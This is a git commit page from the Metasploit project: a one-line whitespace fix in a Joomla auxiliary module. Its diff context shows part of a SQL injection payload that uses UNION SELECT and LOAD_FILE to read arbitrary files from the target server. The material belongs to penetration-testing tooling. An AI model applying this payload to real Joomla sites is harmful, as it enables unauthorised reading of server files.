Msftidy warning fix on Joomla module.

Pre-commit hooks people.
bug/bundler_fix
Tod Beardsley 2014-03-24 12:03:12 -05:00
parent c7ba7e4d92
commit cd9182c77f
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 1 additions and 1 deletions

View File

@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
file = datastore['FILEPATH'].unpack("H*")[0]
catid = datastore['CATEGORYID']
payload = catid.to_s
payload = catid.to_s
payload << ") UNION ALL SELECT CONCAT(0x#{front_marker.unpack('H*')[0]}"
payload << ",IFNULL(CAST(HEX(LOAD_FILE("
payload << "0x#{file})) AS CHAR),0x20),0x#{back_marker.unpack('H*')[0]})#"